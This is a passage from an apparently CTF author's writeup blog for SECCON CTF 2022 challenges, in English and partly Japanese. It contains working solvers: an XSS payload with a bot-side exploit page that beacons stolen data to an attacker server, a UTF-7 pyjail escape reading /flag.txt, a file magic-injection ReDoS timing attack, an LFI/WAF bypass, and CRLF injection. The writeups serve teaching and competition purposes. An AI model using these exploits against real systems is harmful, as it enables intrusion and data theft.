        const url = `${baseUrl}/api/notes/delete`;
        deleteNote(url, noteId);
      }
      await sleep(1000);

      let evilWindow;
      {
        // Access to the deleted page with no token
        // Then, the browser will render a response with 500 status.
        const url = `${baseUrl}/api/notes/${noteId}`;
        evilWindow = open(url);
      }
      await sleep(1000);
      {
        // Open the bot's user page
        // Then, it will pollute the disk cache for the deleted page.
        evilWindow.location = baseUrl;
      }
      await sleep(1000);
      {
        // Access to the deleted page again using History API
        // Then, the browser will render the cached page and the XSS will occur!
        // Note that a bfcache will not be used because the page will have a window.opener reference.
        //   ref. https://web.dev/articles/bfcache?hl=en#avoid_windowopener_references
        evilWindow.location = `${location.origin}/back.html?n=2`;
      }
      await sleep(1000);
      {
        // Send a JavaScript code via postMessage
        // Then, the XSS window will execute it!
        evilWindow.postMessage(evilJs, baseUrl);
      }
    };
    main();
  </script>
</body>
public/back.html
<script>
  const n = parseInt(new URLSearchParams(location.search).get("n"));
  history.go(-n);
</script>
index.js
const path = require("node:path");

const fail = (message) => {
  console.error(message);
  return process.exit(1);
};

const SECCON_BASE_URL = process.env.SECCON_BASE_URL || fail("No SECCON_BASE_URL");
const ATTACK_BASE_URL = process.env.ATTACK_BASE_URL || fail("No ATTACK_BASE_URL");

if (!ATTACK_BASE_URL.startsWith("http://")) {
  fail("Invalid ATTACK_BASE_URL: the CSRF will fail");
}

const LISTEN_PORT = process.env.PORT || "8080";

const sleep = (msec) => new Promise((resolve) => setTimeout(resolve, msec));

const exploit = async () => {
  const noteId =
    // XSS payload:
    `<img src=0 onerror="window.addEventListener('message',e=>eval(e.data))">` +
    // .html -> Content-Type: text/html
    // ref. https://github.com/broofa/mime/blob/main/types/standard.js
    ".html";

  if (noteId.length > 100) {
    // ref. https://github.com/delvedor/find-my-way/blob/v7.3.0/index.js#L87
    fail(`Too long id: ${noteId}`);
  }
  if (
    noteId.includes("..") ||
    noteId.includes("/") ||
    noteId.includes("\\") ||
    noteId.includes("%")
  ) {
    fail(`Invalid id: ${noteId}`);
  }

  const baseUrl = "http://web:3000";

  const reportedUrl = `${ATTACK_BASE_URL}/index.html?${new URLSearchParams({
    baseUrl,
    noteId,
  })}`;

  const res = await (
    await fetch(`${SECCON_BASE_URL}/report`, {
      method: "POST",
      headers: {
        "Content-Type": "application/json",
      },
      body: JSON.stringify({
        url: reportedUrl,
      }),
    })
  ).text();
  console.log(res); // "Received :)"
};

const fastify = require("fastify")();

fastify.register(require("@fastify/static"), {
  root: path.join(__dirname, "public"),
});

fastify.post("/", async (req, reply) => {
  // Received data from navigator.sendBeacon
  console.log(req.body); // Got a flag!
  process.exit(0);
});

const start = async () => {
  fastify.listen(
    { port: LISTEN_PORT, host: "0.0.0.0" },
    async (err, address) => {
      if (err) {
        fastify.log.error(err);
        process.exit(1);
      }

      await sleep(1 * 1000);
      await exploit();
      await sleep(10 * 1000);
      fail("Failed");
    }
  );
};
start();

Flag

SECCON{hack3rs_po11ute_3verything_by_v4ri0us_meanS}

[misc] latexipy

Description:

Latexify as a Service

nc latexipy.seccon.games 2337

Overview

The service returns a LaTeX\LaTeX expression for a given function.

For example:

$ nc latexipy.seccon.games 2337
Latexify as a Service!

E.g.
`` `
def solve(a, b, c):
    return (-b + math.sqrt(b**2 - 4*a*c)) / (2*a)
`` `
ref. https://github.com/google/latexify_py/blob/v0.1.1/examples/equation.ipynb

Input your function (the last line must start with __EOF__):
def f(x, y, z):
    return (x + y)*z
__EOF__

Result:
\mathrm{f}(x, y, z) \triangleq (x + y)z

Source code:

import sys
import ast
import re
import tempfile
from importlib import util


def get_fn_name(source: str) -> str | None:
    root = ast.parse(source)
    if type(root) is not ast.Module:
        return None
    if len(root.body) != 1:
        return None

    fn = root.body[0]
    if type(fn) is not ast.FunctionDef:
        return None

    fn.body.clear()
    if not re.fullmatch(r"def \w+\((\w+(, \w+)*)?\):", ast.unparse(fn)):
        # You must define a function without decorators, type annotations, and so on.
        return None

    return str(fn.name)


print("""
Latexify as a Service!

E.g.
`` `
def solve(a, b, c):
    return (-b + math.sqrt(b**2 - 4*a*c)) / (2*a)
`` `
ref. https://github.com/google/latexify_py/blob/v0.1.1/examples/equation.ipynb

Input your function (the last line must start with __EOF__):
""".strip(), flush=True)

source = ""
while True:
    line = sys.stdin.readline()
    if line.startswith("__EOF__"):
        break
    source += line

name = get_fn_name(source)
if name is None:
    print("Invalid source")
    exit(1)

source += f"""
import latexify
__builtins__["print"](latexify.get_latex({name}))
"""

with tempfile.NamedTemporaryFile(suffix=".py") as file:
    file.write(source.encode())
    file.flush()

    print()
    print("Result:")
    spec = util.spec_from_file_location("tmp", file.name)
    spec.loader.exec_module(util.module_from_spec(spec))

Flag location: /flag.txt

Solution

def get_fn_name(source: str) -> str | None:
    root = ast.parse(source)
    if type(root) is not ast.Module:
        return None
    if len(root.body) != 1:
        return None

    fn = root.body[0]
    if type(fn) is not ast.FunctionDef:
        return None

    fn.body.clear()
    if not re.fullmatch(r"def \w+\((\w+(, \w+)*)?\):", ast.unparse(fn)):
        # You must define a function without decorators, type annotations, and so on.
        return None

    return str(fn.name)

The limitation using AST prevents trivial RCEs.

As a important point, ast.parse ignores comments in the source code. By the way, Python has a feature called magic comment:

Magic comment is just a comment in get_fn_name, but it is recognized as a magic comment for module imports:

    spec = util.spec_from_file_location("tmp", file.name)
    spec.loader.exec_module(util.module_from_spec(spec))

In fact, you can bypass it with UTF-7:

# coding: utf_7
def f(x):
    return x
    #+AAo-print(open("/flag.txt").read())
__EOF__

+AAo- is \n on the UTF-7 encoding, and the above code as a module is:

def f(x):
    return x

print(open("/flag.txt").read())

It is also possible to bypass it using other encodings, e.g. raw_unicode_escape and unicode_escape.

Solver

import os
import pwn

io = pwn.remote(os.getenv("SECCON_HOST"), os.getenv("SECCON_PORT"))

assert b"+AAo-".decode("utf_7") == "\n"

payload = """
# -*- coding: utf_7 -*-
def f(x):
    return x
    #+AAo-print(open("/flag.txt").read())
""".lstrip()

payload += "__EOF__"

io.sendlineafter(b"__EOF__):", payload.encode())

print(io.recvall().decode())

Flag

SECCON{UTF7_is_hack3r_friend1y_encoding}

[misc] txtchecker

Description:

I'm creating a text file checker. It still in the process of implementation...

sshpass -p ctf ssh -oStrictHostKeyChecking=no -oCheckHostIP=no ctf@txtchecker.seccon.games -p 2022

Overview

Source code (a bash script):

#!/bin/bash

read -p "Input a file path: " filepath
file $filepath 2>/dev/null | grep -q "ASCII text" 2>/dev/null

# TODO: print the result the above command.
#   $? == 0 -> It's a text file.
#   $? != 0 -> It's not a text file.
exit 0

There are only three lines! The server executes the script when a player logins with SSH.

Flag location: /flag.txt

Solution

Step 1: Magic file injection

You can specify the arguments of the file command.

man file:

     -m, --magic-file magicfiles
             Specify an alternate list of files and directories containing magic.  This can be a single item,
             or a colon-separated list.  If a compiled magic file is found alongside a file or directory, it
             will be used instead.

You can specify a magic file with -m option and some special files (e.g. /dev/tty and /proc/self/fd/0).

However, you cannot get the result of the file command somce the server does not output anything.

Step 2: A time-based attack with ReDoS

man magic:

              regex       A regular expression match in extended POSIX regular expression syntax (like egrep).
                          Regular expressions can take exponential time to process, and their performance is
                          hard to predict, so their use is discouraged.  When used in production environments,
                          their performance should be carefully checked.  The size of ... snip ...

You can use regex, so you can also do ReDoS! Try a time-based attack with ReDoS.

Solver

import string
import os
import pwn
import time

REDOS_POWER = 20
TIMEOUT = 20

SSH_CMD = f"sshpass -p ctf ssh -oStrictHostKeyChecking=no -oCheckHostIP=no ctf@{os.getenv('SECCON_HOST')} -p {os.getenv('SECCON_PORT')}"


def get_time(rule: str) -> bool:
    io = pwn.process(SSH_CMD, shell=True, stdin=pwn.PTY, raw=False)
    io.sendlineafter(b"Input a file path: ", b"-m /dev/tty /flag.txt")
    io.sendline(rule.encode())
    for i in range(REDOS_POWER):
        io.sendline(f">0 regex \\^(((((((((((((((((((((((((((((.*)*)*)*)*)*)*)*)*)*)*)*)*)*)*)*)*)*)*)*)*)*)*)*)*)*)*)*)*)*@ ReDoS-{i}".encode())
    io.recvuntil(f"ReDoS-{REDOS_POWER - 1}".encode(), timeout=TIMEOUT)
    io.send("\x04")  # Ctrl+D

    t1 = time.time()
    io.recvall(timeout=TIMEOUT)
    t2 = time.time()
    io.close()
    return t2 - t1


def get_rule(index: int, next_chars: str) -> str:
    def escape(s): return s.replace("{", "\\\\{").replace("}", "\\\\}")
    expr = "".join([
        "\\^",
        "[",
        escape(next_chars),
        "]"
    ])
    return f"{index} regex {expr}"


CHARS = "_}" + string.ascii_letters + string.digits

flag = "SECCON{"
while not flag.endswith("}"):
    left = 0
    right = len(CHARS)
    while right - left > 1:
        mid = (left + right)//2
        t_left = get_time(get_rule(len(flag), CHARS[:mid]))
        t_right = get_time(get_rule(len(flag), CHARS[mid:]))
        print(f"{t_left = }, {t_right = }")
        if t_left > t_right:
            right = mid
        else:
            left = mid
    flag += CHARS[left]
    print(flag)
print(f"{flag = }")

Flag

SECCON{reDo5L1fe}

[misc] noiseccon

Description:

Noise! Noise! Noise!

nc noiseccon.seccon.games 1337

Overview

$ nc noiseccon.seccon.games 1337
   _   _       _             ____                           _
  | \ | | ___ (_)___  ___   / ___| ___ _ __   ___ _ __ __ _| |_ ___  _ __
  |  \| |/ _ \| / __|/ _ \ | |  _ / _ \ '_ \ / _ \ '__/ _` | __/ _ \| '__|
  | |\  | (_) | \__ \  __/ | |_| |  __/ | | |  __/ | | (_| | || (_) | |
  |_| \_|\___/|_|___/\___|  \____|\___|_| |_|\___|_|  \__,_|\__\___/|_|

Flag length: 21
Image width: 256
Image height: 256
Scale x: 1
Scale y: 2
UklGRoo7AABXRUJQVlA4TH07AAAv/8A/AM0ABDHgf9pA... snip (base64 of an image data) ...5SImJZRsMGAA==

Source code:

const { noise } = require("./perlin.js");
const sharp = require("sharp");
const crypto = require("node:crypto");
const readline = require("node:readline").promises;

const FLAG = process.env.FLAG ?? console.log("No flag") ?? process.exit(1);
const WIDTH = 256;
const HEIGHT = 256;

console.log(
  `   _   _       _             ____                           _
  | \\ | | ___ (_)___  ___   / ___| ___ _ __   ___ _ __ __ _| |_ ___  _ __
  |  \\| |/ _ \\| / __|/ _ \\ | |  _ / _ \\ '_ \\ / _ \\ '__/ _\` | __/ _ \\| '__|
  | |\\  | (_) | \\__ \\  __/ | |_| |  __/ | | |  __/ | | (_| | || (_) | |
  |_| \\_|\\___/|_|___/\\___|  \\____|\\___|_| |_|\\___|_|  \\__,_|\\__\\___/|_|
  `
);

console.log(`Flag length: ${FLAG.length}`);
console.log(`Image width: ${WIDTH}`);
console.log(`Image height: ${HEIGHT}`);

const paddedFlag = [
  ...crypto.randomBytes(8), // random prefix
  ...Buffer.from(FLAG),
  ...crypto.randomBytes(8), // random suffix
];

// bytes_to_long
let flagInt = 0n;
for (const b of Buffer.from(paddedFlag)) {
  flagInt = (flagInt << 8n) | BigInt(b);
}

const generateNoise = async (scaleX, scaleY) => {
  const div = (x, y) => {
    const p = 4;
    return Number(BigInt.asUintN(32 + p, (x * BigInt(1 << p)) / y)) / (1 << p);
  };

  const offsetX = div(flagInt, scaleX);
  const offsetY = div(flagInt, scaleY);

  noise.seed(crypto.randomInt(65536));
  const colors = [];
  for (let y = 0; y < HEIGHT; y++) {
    for (let x = 0; x < WIDTH; x++) {
      let v = noise.perlin2(offsetX + x * 0.05, offsetY + y * 0.05);
      v = (v + 1.0) * 0.5; // [-1, 1] -> [0, 1]
      colors.push((v * 256) | 0);
    }
  }

  const image = await sharp(Uint8Array.from(colors), {
    raw: {
      width: WIDTH,
      height: HEIGHT,
      channels: 1,
    },
  })
    .webp({ lossless: true })
    .toBuffer();
  return image;
};

const main = async () => {
  const rl = readline.createInterface({
    input: process.stdin,
    output: process.stdout,
    terminal: false,
  });

  const toBigInt = (value) => {
    if (value.length > 100) {
      console.log(`Invalid value: ${value}`);
      process.exit(1);
    }
    const result = BigInt(value);
    if (result <= 0n) {
      console.log(`Invalid value: ${value}`);
      process.exit(1);
    }
    return result;
  };

  const query = async () => {
    const scaleX = toBigInt(await rl.question("Scale x: "));
    const scaleY = toBigInt(await rl.question("Scale y: "));

    const image = await generateNoise(scaleX, scaleY);
    console.log(image.toString("base64"));
  };
  await query();

  rl.close();
};

main();

The server returns a noise image using https://github.com/josephg/noisejs.

Example noise:

The noise is generated with an algorithm called Perlin noise:

Solution

Step 1: Finding coordinates of lattice

  const offsetX = div(flagInt, scaleX);
  const offsetY = div(flagInt, scaleY);

  noise.seed(crypto.randomInt(65536));
  const colors = [];
  for (let y = 0; y < HEIGHT; y++) {
    for (let x = 0; x < WIDTH; x++) {
      let v = noise.perlin2(offsetX + x * 0.05, offsetY + y * 0.05);
      v = (v + 1.0) * 0.5; // [-1, 1] -> [0, 1]
      colors.push((v * 256) | 0);
    }
  }

flagInt/scakeX/scaleY affect only the offsets of the noise. In other words, you may extract flag information from the "position" of a noise.

Implementation of Perlin noise:

// From: https://github.com/josephg/noisejs/blob/master/perlin.js#L250-L273

  // 2D Perlin Noise
  module.perlin2 = function(x, y) {
    // Find unit grid cell containing point
    var X = Math.floor(x), Y = Math.floor(y);
    // Get relative xy coordinates of point within that cell
    x = x - X; y = y - Y;
    // Wrap the integer cells at 255 (smaller integer period can be introduced here)
    X = X & 255; Y = Y & 255;

    // Calculate noise contributions from each of the four corners
    var n00 = gradP[X+perm[Y]].dot2(x, y);
    var n01 = gradP[X+perm[Y+1]].dot2(x, y-1);
    var n10 = gradP[X+1+perm[Y]].dot2(x-1, y);
    var n11 = gradP[X+1+perm[Y+1]].dot2(x-1, y-1);

    // Compute the fade curve value for x
    var u = fade(x);

    // Interpolate the four results
    return lerp(
        lerp(n00, n10, u),
        lerp(n01, n11, u),
       fade(y));
  };

Each gradient gradP is defined on a seed value, and parlin2(x, y) is computed using the gradients of four neighbour lattice points of (x, y). The value is in [1,1]\left[-1, 1\right].

Also, each gradient is selected randomly from:

  var grad3 = [new Grad(1,1,0),new Grad(-1,1,0),new Grad(1,-1,0),new Grad(-1,-1,0),
               new Grad(1,0,1),new Grad(-1,0,1),new Grad(1,0,-1),new Grad(-1,0,-1),
               new Grad(0,1,1),new Grad(0,-1,1),new Grad(0,1,-1),new Grad(0,-1,-1)];

We are considering two dimensions in this challenge, so the candidates of gradients are as follows:

(11),(11),(11),(11),(10),(10),(01),(01)\begin{pmatrix}1\\1\end{pmatrix}, \begin{pmatrix}-1\\1\end{pmatrix}, \begin{pmatrix}1\\-1\end{pmatrix}, \begin{pmatrix}-1\\-1\end{pmatrix}, \begin{pmatrix}1\\0\end{pmatrix}, \begin{pmatrix}-1\\0\end{pmatrix}, \begin{pmatrix}0\\1\end{pmatrix}, \begin{pmatrix}0\\-1\end{pmatrix}

Herein, consider the following state:

  • gradP[X+perm[Y]] =(0±1)= \begin{pmatrix}0\\ \plusmn 1\end{pmatrix}
  • gradP[X+1+perm[Y]] =(0±1)= \begin{pmatrix}0\\ \plusmn 1\end{pmatrix}

Then,

x[X,X+1],perlin2(x,Y)=0.\forall x\in \left[X, X+1\right], \mathtt{perlin2}(x, Y) = 0\textrm{.}

Proof:

For x[X,X+1]\forall x\in \left[X, X+1\right],

  • n00: n00=(0±1)(xxYY)=(0±1)(xx0)=0n_{00} = \begin{pmatrix}0\\\plusmn 1\end{pmatrix} \cdot \begin{pmatrix}x - \lfloor x \rfloor \\ Y - \lfloor Y \rfloor\end{pmatrix} = \begin{pmatrix}0\\\plusmn 1\end{pmatrix} \cdot \begin{pmatrix}x - \lfloor x \rfloor \\ 0\end{pmatrix} = 0
  • n10: n10=(0±1)(xx1YY)=(0±1)(xx10)=0n_{10} = \begin{pmatrix}0\\\plusmn 1\end{pmatrix} \cdot \begin{pmatrix}x - \lfloor x \rfloor -1 \\ Y - \lfloor Y \rfloor\end{pmatrix} = \begin{pmatrix}0\\\plusmn 1\end{pmatrix} \cdot \begin{pmatrix}x - \lfloor x \rfloor -1 \\ 0\end{pmatrix} = 0

and fade(YY)=0\mathtt{fade}(Y - \lfloor Y \rfloor) = 0. So,

perlin2(x,Y)=lerp(n00,n10,fade(xx))=lerp(0,0,fade(xx))=0\mathtt{perlin2}(x, Y) = \mathtt{lerp}\left(n_{00}, n_{10}, \mathtt{fade}(x - \lfloor x \rfloor) \right) = \mathtt{lerp}\left(0, 0, \mathtt{fade}(x - \lfloor x \rfloor) \right) = 0 \,{}_\blacksquare

Conversely, it is not true in general at other cases.

Thus, if the size of the interval of xx such that each perlin2(x,y0)\mathtt{perlin2}(x, y_0) is 00 with a fixed integer y0y_0 is 11, let x0x_0 be an endpoint of the interval. Then, (x0,y0)(x_0, y_0) is one of the lattice points with high probability.

The source code for the experiment:

const { noise } = require("./perlin.js");
const nodeplotlib = require("nodeplotlib");
const crypto = require("node:crypto");

noise.seed(crypto.randomInt(65536));
console.log(noise);

const values = [];

const y0 = 0;
for (let i = 0; i < 1000; i++) {
  const x = i * 0.01;
  const v = noise.perlin2(x, y0);
  values.push(v);
}

const data = [
  {
    x: [...values.keys()],
    y: values,
    type: "scatter",
  },
];
nodeplotlib.plot(data);

The result show an interval between x=400 and x=500 as a the lattice size. So you can find the "position" of the lattice.

Step 2: An oracle for each bit

Source code:

  const div = (x, y) => {
    const p = 4;
    return Number(BigInt.asUintN(32 + p, (x * BigInt(1 << p)) / y)) / (1 << p);
  };

  const offsetX = div(flagInt, scaleX);
  const offsetY = div(flagInt, scaleY);

  noise.seed(crypto.randomInt(65536));
  const colors = [];
  for (let y = 0; y < HEIGHT; y++) {
    for (let x = 0; x < WIDTH; x++) {
      let v = noise.perlin2(offsetX + x * 0.05, offsetY + y * 0.05);
      v = (v + 1.0) * 0.5; // [-1, 1] -> [0, 1]
      colors.push((v * 256) | 0);
    }
  }

For noise.perlin2(offsetX + x * 0.05, offsetY + y * 0.05), The offsetX and offsetY contribute only their fractional parts to the position of lattice.

Based on these factors, you can construct an oracle to identify 0/1 for each bit of a flag. Please see the following solver for details.

Solver

from concurrent.futures import ThreadPoolExecutor
from Crypto.Util.number import long_to_bytes, bytes_to_long
from PIL import Image
import pwn
from io import BytesIO
import base64
import os

LATTICE_SIZE = 20  # = 1 / 0.05

with pwn.remote(os.getenv('SECCON_HOST'), os.getenv('SECCON_PORT')) as io:
    io.recvuntil(b"Flag length: ")
    flag_bit_len = int(io.recvline().decode())*8
    io.recvuntil(b"Image width: ")
    width = int(io.recvline().decode())
    io.recvuntil(b"Image height: ")
    height = int(io.recvline().decode())


def get_image(scale_x, scale_y) -> Image:
    io = pwn.remote(os.getenv('SECCON_HOST'), os.getenv('SECCON_PORT'))
    io.sendlineafter(b"Scale x: ", str(scale_x).encode())
    io.sendlineafter(b"Scale y: ", str(scale_y).encode())
    binary = base64.b64decode(io.recvline().strip().decode())
    io.close()
    return Image.open(BytesIO(binary), formats=["webp"])


def oracle(bit_index: int) -> bool:
    scale_x = 2**(bit_index + 1)
    scale_y = 1

    for _ in range(10):
        img = get_image(scale_x, scale_y)
        # img.save("output.webp")
        data = list(img.getdata())
        assert len(data) == width*height

        for y in range(0, height, LATTICE_SIZE):
            cnt = 0
            for x in range(width):
                color = data[y*width + x][0]
                if abs(color - 128) == 0:
                    cnt += 1
                else:
                    if 0 <= cnt - LATTICE_SIZE < 2:
                        i = (x - cnt - 2) % LATTICE_SIZE
                        return i < LATTICE_SIZE/2
                    cnt = 0
    print("Failed")
    exit(1)


padded_bit_len = 8*8

flag = 0
with ThreadPoolExecutor(max_workers=8) as executor:
    bits = executor.map(oracle, range(padded_bit_len, padded_bit_len + flag_bit_len))
for index, bit in enumerate(bits):
    flag |= bit << index

print(long_to_bytes(flag))

Flag

SECCON{p3RLin_W0r1d!}

Footnotes

  1. Because of my lack of consideration, many players solved this challenge by unintended solutions 😢

  2. In fact, you can skip this step because bfcache is disabled by default options of puppeteer.

]]> CTF <![CDATA[SECCON CTF 2022 Quals: Author writeups - 日本語]]> https://blog.arkark.dev/2022/11/18/seccon-ja https://blog.arkark.dev/2022/11/18/seccon-ja Fri, 18 Nov 2022 00:00:00 GMT SECCON CTFに参加いただいたみなさん、ありがとうございます。感想やwriteupなどをたのしみにしています! 去年に引き続きSECCON CTF 2022 Qualsでいくつか作問したので、それらのwriteupです。

  • The English version is here!

今年は以下の問題をつくりました:

ChallengeCategoryDifficultyKeywordsSolved
skipinxwebwamupquery parser, DoS102
easylfiwebeasycurl, URL globbing, LFI62
bffcalcwebmediumCRLF injection, request splitting41
piyosaywebmediumTrusted Types, DOMPurify, RegExp19
denoboxwebmedium-hardprototype pollution, import maps1
spanotewebhardChrome, disk cache, bfcache1
latexipymisceasypyjail, magic comment8
txtcheckermiscmediummagic file, ReDoS23
noisecconmiscmedium-hard1Perlin noise22

この記事では各問題の問題概要と解法のみ書きます。作問感想や裏話は別記事として書く予定ですのでお楽しみに(?)

なお、各問題のソースコードやソルバはmy-ctf-challengesのリポジトリに追加しています。

[web] skipinx

Description:

ALL YOU HAVE TO DO IS SKIP NGINX

  • http://skipinx.seccon.games:8080

Overview

シンプルなサーバサイド問です。

アクセスすると、Access here directly, not via nginx :(と返ってきます。

nginx/default.conf
server {
  listen 8080 default_server;
  server_name nginx;

  location / {
    set $args "${args}&proxy=nginx";
    proxy_pass http://web:3000;
  }
}

nginxは、リクエストにproxy=nginxのクエリパラメータを付与して後段のサーバにプロキシします。

web/index.js
const app = require("express")();

const FLAG = process.env.FLAG ?? "SECCON{dummy}";
const PORT = 3000;

app.get("/", (req, res) => {
  req.query.proxy.includes("nginx")
    ? res.status(400).send("Access here directly, not via nginx :(")
    : res.send(`Congratz! You got a flag: ${FLAG}`);
});

app.listen({ port: PORT, host: "0.0.0.0" }, () => {
  console.log(`Server listening at ${PORT}`);
});

後段のサーバ(express)はそのクエリパラメータが付いていない場合のみフラグを返します。

nginxを経由せずにアクセスしたらフラグが手に入るが、そんなことはできるだろうか?という問題です。 もちろんそんなことは不可能なので、うまくbypassしましょう。

Solution

expressはデフォルトのクエリパーサとしてqsを利用しています:

expressはqsに渡すオプションにすべてデフォルト値を使っています:

parameterLimitオプションはクエリパラメータの上限数を指定する値であり、デフォルト値は1000です。 実装を確認すると:

// from: https://github.com/ljharb/qs/blob/v6.11.0/lib/parse.js#L54-L55
var limit = options.parameterLimit === Infinity ? undefined : options.parameterLimit;
var parts = cleanStr.split(options.delimiter, limit);

とあり、parameterLimit個以降のクエリパラメータをすべて無視していることがわかります2

つまり、1000個以上のクエリパラメータが付いたリクエストを送ると、nginxの付与したproxy=nginxは無視されるようになり、bypassが可能になります。

Solver

import os
import httpx

BASE_URL = "http://skipinx.seccon.games:8080"

# ref. https://github.com/ljharb/qs/blob/v6.11.0/lib/parse.js#L21
PARAMETER_LIMIT = 1000

query = "proxy=something" + ("&"*(PARAMETER_LIMIT - 1))
res = httpx.get(f"{BASE_URL}/?{query}")
print(res.text)

Flag

SECCON{sometimes_deFault_options_are_useful_to_bypa55}

[web] easylfi

Description:

Can you read my secret?

  • http://easylfi.seccon.games:3000

Overview

サーバサイド問です。

ページにアクセス:

testをsubmitすると/hello.html?%7Bname%7D=testに飛ばされる:

web/app.py
from flask import Flask, request, Response
import subprocess
import os

app = Flask(__name__)


def validate(key: str) -> bool:
    # E.g. key == "{name}" -> True
    #      key == "name"   -> False
    if len(key) == 0:
        return False
    is_valid = True
    for i, c in enumerate(key):
        if i == 0:
            is_valid &= c == "{"
        elif i == len(key) - 1:
            is_valid &= c == "}"
        else:
            is_valid &= c != "{" and c != "}"
    return is_valid


def template(text: str, params: dict[str, str]) -> str:
    # A very simple template engine
    for key, value in params.items():
        if not validate(key):
            return f"Invalid key: {key}"
        text = text.replace(key, value)
    return text


@app.after_request
def waf(response: Response):
    if b"SECCON" in b"".join(response.response):
        return Response("Try harder")
    return response


@app.route("/")
@app.route("/<path:filename>")
def index(filename: str = "index.html"):
    if ".." in filename or "%" in filename:
        return "Do not try path traversal :("

    try:
        proc = subprocess.run(
            ["curl", f"file://{os.getcwd()}/public/{filename}"],
            capture_output=True,
            timeout=1,
        )
    except subprocess.TimeoutExpired:
        return "Timeout"

    if proc.returncode != 0:
        return "Something wrong..."
    return template(proc.stdout.decode(), request.args)

サーバ上の/flag.txtからフラグを盗む問題です。

Solution

Step 1: path traversal

サーバ上では、ファイルの中身を見るためにcurlを使っています:

        proc = subprocess.run(
            ["curl", f"file://{os.getcwd()}/public/{filename}"],
            capture_output=True,
            timeout=1,
        )

/flag.txtを表示するためにはpath traversalをしたくなりますが、

    if ".." in filename or "%" in filename:
        return "Do not try path traversal :("

で防がれています。

ところでcurlにはURL globbingという機能があり、一度に複数のURLへのアクセスが可能です3。 実はこの機能を使えばbypassが可能です:

$ http "http://localhost:3000/.{.}/.{.}/flag.txt"
HTTP/1.1 200 OK
Connection: close
Content-Length: 10
Content-Type: text/html; charset=utf-8
Date: Sat, 05 Nov 2022 12:09:18 GMT
Server: Werkzeug/2.2.2 Python/3.10.8

Try harder

ただし、

@app.after_request
def waf(response: Response):
    if b"SECCON" in b"".join(response.response):
        return Response("Try harder")
    return response

のWAFによって、フラグをそのまま表示することができないのでもう1段階なにかをする必要があります。

Step 2: bypassing WAF

サーバは、curlの出力結果を

    return template(proc.stdout.decode(), request.args)

で変換したあとにレスポンスとして返しています。

テンプレートエンジンの実装は以下のとおり:

def validate(key: str) -> bool:
    # E.g. key == "{name}" -> True
    #      key == "name"   -> False
    if len(key) == 0:
        return False
    is_valid = True
    for i, c in enumerate(key):
        if i == 0:
            is_valid &= c == "{"
        elif i == len(key) - 1:
            is_valid &= c == "}"
        else:
            is_valid &= c != "{" and c != "}"
    return is_valid


def template(text: str, params: dict[str, str]) -> str:
    # A very simple template engine
    for key, value in params.items():
        if not validate(key):
            return f"Invalid key: {key}"
        text = text.replace(key, value)
    return text

この処理を悪用して、フラグからSECCONの文字列を消してフラグの中身部分を返すようにすることはできないでしょうか。

まず重要なポイントとしてvalidate関数にはバグがあり、実はvalidate("{")Trueを返します。 このバグとcurlのURL globbingの挙動を利用してうまくbypassします。

例えば、

  • URL: file:///app/public/{.}./{.}./{app/public/hello.html,flag.txt}
  • params: 
    {
        "{name}": "{",
        "{": "}{",
        "{!</h1>\n</body>\n</html>\n--_curl_--file:///app/public/../../flag.txt\nSECCON}": ""
    }

でbypassが可能です。

テンプレートエンジン内での置換の過程は以下のとおりです。

最初:

... snip ...
<body>
  <h1>Hello, {name}!</h1>
</body>
</html>
--_curl_--file:///app/public/../../flag.txt
SECCON{real_flag}

"{name}""{":

... snip ...
<body>
  <h1>Hello, {!</h1>
</body>
</html>
--_curl_--file:///app/public/../../flag.txt
SECCON{real_flag}

"{""}{":

... snip ...
<body>
  <h1>Hello, }{!</h1>
</body>
</html>
--_curl_--file:///app/public/../../flag.txt
SECCON}{real_flag}

"{!</h1>\n</body>\n</html>\n--_curl_--file:///app/public/../../flag.txt\nSECCON}""":

... snip ...
<body>
  <h1>Hello, }{real_flag}

Solver

import os
import httpx

BASE_URL = f"http://easylfi.seccon.games:3000"

res = httpx.get(
    BASE_URL + "/{.}./{.}./{app/public/hello.html,flag.txt}",
    params={
        "{name}": "{",
        "{": "}{",
        "{!</h1>\n</body>\n</html>\n--_curl_--file:///app/public/../../flag.txt\nSECCON}": "",
    },
)

print("SECCON" + res.text.split("<h1>Hello, }")[1])

Flag

SECCON{i_lik3_fe4ture_of_copy_aS_cur1_in_br0wser}

[web] bffcalc

Description:

There is a simple calculator!

  • http://bffcalc.seccon.games:3000

Overview

簡単な演算を計算してくれるWebサービスです。

構成は複雑でdocker-copmose.ymlは以下のとおりです:

version: "3"

services:
  nginx:
    build: ./nginx
    restart: always
    ports:
      - "3000:3000"
  bff:
    build: ./bff
    restart: always
  backend:
    build: ./backend
    restart: always
  report:
    build: ./report
    restart: always
  bot:
    build: ./bot
    restart: always
    environment:
      - FLAG=SECCON{dummydummy}

ページにアクセスするときはnginxbffbackendの経路になっています。

  • nginx: bffreportへのプロキシ
  • bff: 静的ファイルの配信とbackendへのプロキシ
  • backend: 簡単な演算の計算を行う

フレームワークにはpython製のcherrypyが使われています。 また、フラグはbotのcookieにセットされます。

Solution

Step 1: XSS

まず、index.html

        const result = await (await fetch("/api?expr=" + encodeURIComponent(expr))).text();
        document.getElementById("result").innerHTML = result || " ";

で自明なXSS脆弱性があります。

ただし、botのcookieにはHttpOnly属性が付いているため、document.cookie経由ではcookieの中身が読めません。

Step 2: CRLF injection

bffbackendに中継する処理は以下のようになっています:

def proxy(req) -> str:
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect(("backend", 3000))
    sock.settimeout(1)

    payload = ""
    method = req.method
    path = req.path_info
    if req.query_string:
        path += "?" + req.query_string
    payload += f"{method} {path} HTTP/1.1\r\n"
    for k, v in req.headers.items():
        payload += f"{k}: {v}\r\n"
    payload += "\r\n"

    sock.send(payload.encode())
    time.sleep(.3)
    try:
        data = sock.recv(4096)
        body = data.split(b"\r\n\r\n", 1)[1].decode()
    except (IndexError, TimeoutError) as e:
        print(e)
        body = str(e)
    return body

socketで直接HTTPリクエストのペイロードを組んでいるため、ここでなんらかの悪さができそうです。

ここで、cherrypyのヘッダ周りの処理を確認すると:

ヘッダのvalueに対してRFC 2047に従ったdecode処理が行われていることがわかります。 よって、\r\nをエンコードしたヘッダを送信することによって上記のproxy関数に対してCRLF injectionを行うことが可能になります。

CRLF injectionをうまく利用することによって、リクエスト時に一緒に送信されるcookieの値がレスポンスのbody内に含まれるようなリクエストを構成することはできるだろうか?

backendはcherrypyで実装されていますが、WSGIとしてwaitressも使われています。waitressの実装を読むと

